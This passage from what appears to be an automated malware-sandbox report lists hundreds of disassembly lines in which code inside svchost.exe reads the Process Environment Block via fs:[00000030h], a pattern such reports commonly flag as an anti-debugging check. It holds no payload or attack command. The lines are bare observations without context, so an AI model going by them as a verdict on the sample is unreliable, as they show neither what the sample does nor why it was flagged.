            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F0115 mov eax, dword ptr fs:[00000030h]2_2_033F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C156 mov eax, dword ptr fs:[00000030h]2_2_0332C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C8158 mov eax, dword ptr fs:[00000030h]2_2_033C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]2_2_03336154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]2_2_03336154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov ecx, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034061E5 mov eax, dword ptr fs:[00000030h]2_2_034061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03370185 mov eax, dword ptr fs:[00000030h]2_2_03370185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]2_2_033D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]2_2_033D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033601F8 mov eax, dword ptr fs:[00000030h]2_2_033601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6030 mov eax, dword ptr fs:[00000030h]2_2_033C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A020 mov eax, dword ptr fs:[00000030h]2_2_0332A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C020 mov eax, dword ptr fs:[00000030h]2_2_0332C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4000 mov ecx, dword ptr fs:[00000030h]2_2_033B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335C073 mov eax, dword ptr fs:[00000030h]2_2_0335C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332050 mov eax, dword ptr fs:[00000030h]2_2_03332050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6050 mov eax, dword ptr fs:[00000030h]2_2_033B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov eax, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov ecx, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033280A0 mov eax, dword ptr fs:[00000030h]2_2_033280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C80A8 mov eax, dword ptr fs:[00000030h]2_2_033C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333208A mov eax, dword ptr fs:[00000030h]2_2_0333208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C0F0 mov eax, dword ptr fs:[00000030h]2_2_0332C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033720F0 mov ecx, dword ptr fs:[00000030h]2_2_033720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0332A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033380E9 mov eax, dword ptr fs:[00000030h]2_2_033380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B60E0 mov eax, dword ptr fs:[00000030h]2_2_033B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B20DE mov eax, dword ptr fs:[00000030h]2_2_033B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov ecx, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AC730 mov eax, dword ptr fs:[00000030h]2_2_033AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330710 mov eax, dword ptr fs:[00000030h]2_2_03330710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360710 mov eax, dword ptr fs:[00000030h]2_2_03360710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C700 mov eax, dword ptr fs:[00000030h]2_2_0336C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338770 mov eax, dword ptr fs:[00000030h]2_2_03338770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330750 mov eax, dword ptr fs:[00000030h]2_2_03330750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE75D mov eax, dword ptr fs:[00000030h]2_2_033BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4755 mov eax, dword ptr fs:[00000030h]2_2_033B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov esi, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033307AF mov eax, dword ptr fs:[00000030h]2_2_033307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E47A0 mov eax, dword ptr fs:[00000030h]2_2_033E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D678E mov eax, dword ptr fs:[00000030h]2_2_033D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE7E1 mov eax, dword ptr fs:[00000030h]2_2_033BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C0 mov eax, dword ptr fs:[00000030h]2_2_0333C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B07C3 mov eax, dword ptr fs:[00000030h]2_2_033B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E627 mov eax, dword ptr fs:[00000030h]2_2_0334E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03366620 mov eax, dword ptr fs:[00000030h]2_2_03366620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368620 mov eax, dword ptr fs:[00000030h]2_2_03368620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333262C mov eax, dword ptr fs:[00000030h]2_2_0333262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372619 mov eax, dword ptr fs:[00000030h]2_2_03372619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE609 mov eax, dword ptr fs:[00000030h]2_2_033AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03362674 mov eax, dword ptr fs:[00000030h]2_2_03362674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334C640 mov eax, dword ptr fs:[00000030h]2_2_0334C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033666B0 mov eax, dword ptr fs:[00000030h]2_2_033666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C6A6 mov eax, dword ptr fs:[00000030h]2_2_0336C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov eax, dword ptr fs:[00000030h]2_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6500 mov eax, dword ptr fs:[00000030h]2_2_033C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E59C mov eax, dword ptr fs:[00000030h]2_2_0336E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov eax, dword ptr fs:[00000030h]2_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov ecx, dword ptr fs:[00000030h]2_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364588 mov eax, dword ptr fs:[00000030h]2_2_03364588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033325E0 mov eax, dword ptr fs:[00000030h]2_2_033325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033365D0 mov eax, dword ptr fs:[00000030h]2_2_033365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A430 mov eax, dword ptr fs:[00000030h]2_2_0336A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C427 mov eax, dword ptr fs:[00000030h]2_2_0332C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC460 mov ecx, dword ptr fs:[00000030h]2_2_033BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA456 mov eax, dword ptr fs:[00000030h]2_2_033EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332645D mov eax, dword ptr fs:[00000030h]2_2_0332645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335245A mov eax, dword ptr fs:[00000030h]2_2_0335245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033644B0 mov ecx, dword ptr fs:[00000030h]2_2_033644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BA4B0 mov eax, dword ptr fs:[00000030h]2_2_033BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033364AB mov eax, dword ptr fs:[00000030h]2_2_033364AB
